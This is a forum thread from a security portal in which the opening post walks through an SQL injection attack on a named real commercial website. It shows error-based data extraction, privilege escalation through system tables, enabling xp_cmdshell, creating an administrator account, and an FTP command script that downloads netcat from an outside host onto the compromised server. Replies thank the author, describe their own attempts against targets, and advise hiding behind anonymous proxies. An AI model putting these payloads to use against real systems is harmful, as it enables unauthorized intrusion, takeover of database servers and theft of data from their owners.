Waraxe IT Security Portal
Login or Register
November 24, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 68
Members: 0
Total: 68
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> DO u think u know everything about sql injection heh?
Post new topicReply to topic View previous topic :: View next topic
DO u think u know everything about sql injection heh?
PostPosted: Mon Dec 27, 2004 6:53 pm Reply with quote
r0ot
Regular user
Regular user
Joined: Jul 18, 2004
Posts: 15




Sorry i was missing almost a year from here.. but im back..


SQL INJECTION GATHERED FROM MASTERVN
REVISION 0.1
RELEASE A

EXAMPLE TO USE:
http://www.nhaxinh.com.vn/FullStory.asp?id=1

Exploiting the hole:
http://www.nhaxinh.com.vn/FullStory.asp?id=1'

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBCSQLServerDriver] [SQLServer]
Unclosed quotation mark before the character string ''.
/Including/general.asp, line 840\




VERSION
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@version)--

Code:

[SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright ? 1988-2002 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/Including/general.asp, line 840



SERVER NAME
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@servername)--

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UNESCO' to a column of data type int.
/Including/general.asp, line 840



DATABASE NAME
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,db_name())--

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'NhaXinh' to a column of data type int.
/Including/general.asp, line 840



USER
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,system_user)--

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'nhaxinh' to a column of data type int.
/Including/general.asp, line 840



OPENING REMOTE LINK (http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_oa-oz_78z8.asp)
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server] Ad hoc access to OLE DB provider 'sqloledb' has been denied. You must access this provider through a linked server.
/Including/general.asp, line 840



GUEST = DB_OWNER :DDD
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx' exec sp_executesql N'drop view dbo.test'--

Code:

No result expected, normal page loading
Enable us to do sum nice stuff like xp_regwrite e xp_cmdshell



ADDIN TO "BUILTIN\ADMINISTRATORS"
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysxlogins' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set xstatus=18 where name=''BUILTIN\ADMINISTRATORS''','xx' exec sp_executesql N'drop view dbo.test'--

and then

http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..sp_addsrvrolemember 'nhaxinh',sysadmin --

ENABLE OPENROWSET/OLEDB
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'SYSTEM'.
/Including/general.asp, line 840


http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters'



ENABLE MASTER..XP_CMDSHELL & "ALLOW UPDATES"
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')

!!PAY ATTETION TO THE SERVER= PARAMETER

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Could not process object 'set fmtonly off master..sp_addextendedproc xp_cmd 'xpsql70.dll' exec sp_configure 'allow updates', '1' reconfigure with override'. The OLE DB provider 'sqloledb' indicates that the object has no columns.
/Including/general.asp, line 840


if dun work try:
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')--



NOW SCRIPT KIDDIES


http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'ipconfig'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 b from t where b like '%25IP Address%25'))-- (%25 == ?%?)

Code:


Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 203.162.7.70 ' to a column of data type int.
/Including/general.asp, line 840


C:\> ping 203.162.7.70
Pinging 203.162.7.70 with 32 bytes of data:
Reply from 203.162.7.70: bytes=32 time=232ms TTL=118
C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service (Version 5.0).
User (203.162.7.70:(none)):
203.162.7.70 == panvietnam.com



http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add"')-- (%26 == "&")

Code:

C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service
(Version 5.0).
User (203.162.7.70:(none)): a
331 Password required for a.
Password:
530 User a cannot log in.
Login failed.
ftp> bye



UPLOAD NETCAT L?N
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af" %26 del f')-- (%3E == ">")

Code:

echo open a.b.c.d >f
echo user a a >>f
echo bin >> f
echo cd a >>f
echo mget * >>f
echo quit >>f
ftp -v -i -n -s:f
del f



http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'dir nx.exe'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1))--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))--

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '08/17/2003 11:31a 11,776 nx.exe' to a column of data type int.
/Including/general.asp, line 840



Enjoy and happy sql injection guys

_________________
View user's profile Send private message
PostPosted: Mon Dec 27, 2004 9:18 pm Reply with quote
Postal
Regular user
Regular user
Joined: Dec 24, 2004
Posts: 5
Location: Latvija




Nice to see you back! Razz

And thanks for this Exclamation

_________________
Born to learn!!!
View user's profile Send private message Yahoo Messenger MSN Messenger ICQ Number
PostPosted: Mon Dec 27, 2004 10:43 pm Reply with quote
any2000
Active user
Active user
Joined: Dec 02, 2004
Posts: 26




very very thanks for this Very Happy
View user's profile Send private message
PostPosted: Mon Dec 27, 2004 11:44 pm Reply with quote
r0ot
Regular user
Regular user
Joined: Jul 18, 2004
Posts: 15




heheh its nice to come back again.. i spent hole year studing a lot and more important improving my sql admin / dev skills, as you can see above i got much to learn... :/ duh

Comments bout the code, variations of it, etc are appreciated.


Regards

_________________
View user's profile Send private message
PostPosted: Wed Dec 29, 2004 5:15 pm Reply with quote
ReFleX
Active user
Active user
Joined: Nov 05, 2004
Posts: 39
Location: ARGENTINA!




Hi!, a very good job, I were trying it but i get this error when I execute the last injections
Code:

[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'BUILTIN\Administrators'.


Somebody know why coould this be??
View user's profile Send private message Visit poster's website
PostPosted: Thu Dec 30, 2004 11:51 am Reply with quote
r0ot
Regular user
Regular user
Joined: Jul 18, 2004
Posts: 15




sum of the begginning queries dun worked out, so u couldnt add a user to the users... :/ bad..try to review the queries and re-exec it, remember always try to use a good anom proxy

_________________
View user's profile Send private message
PostPosted: Sun Feb 13, 2005 11:05 am Reply with quote
dairy123
Beginner
Beginner
Joined: Feb 13, 2005
Posts: 4




that was an extremely cool tut - so much thanks r00t.
just in time as i was losing sleep tryin to figure out which sys tables, sps and xps to use Laughing you saved my so many nights !!

looks like i am getting the same message
Login failed for user 'BUILTIN\Administrators'.

the sql admin seems to be a bit knowledgable - disabled select on the password column of sysxlogins Sad
any thoughts i can elevate the user's privileges?
thnx much
View user's profile Send private message
PostPosted: Tue Nov 01, 2005 7:13 am Reply with quote
linzi
Beginner
Beginner
Joined: Nov 01, 2005
Posts: 4




very good,i hv learn more sql injection skill from urs
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Thu Dec 08, 2005 11:46 am Reply with quote
goblin
Regular user
Regular user
Joined: Nov 03, 2005
Posts: 8




thx, you have a job! i am learning it now .so if someone want to injection like that ,you must master odbc
View user's profile Send private message ICQ Number
Re: DO u think u know everything about sql injection heh?
PostPosted: Thu Dec 08, 2005 11:47 am Reply with quote
goblin
Regular user
Regular user
Joined: Nov 03, 2005
Posts: 8




thx, you have a job! i am learning it now .so if someone want to injection like that ,you must master odbc
View user's profile Send private message ICQ Number
PostPosted: Tue Dec 20, 2005 9:22 pm Reply with quote
vcore
Regular user
Regular user
Joined: Jun 28, 2005
Posts: 13




Thank you. Two questions:
What's the diference beetwen AND and & Question
and When i put 1 and 1=convert(int,@@version)-- i have a "type mismatch"
(generally Cint), how should I fix this Question
Sorry for my englisg Crying or Very sad
View user's profile Send private message Visit poster's website
DO u think u know everything about sql injection heh?
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.036 Seconds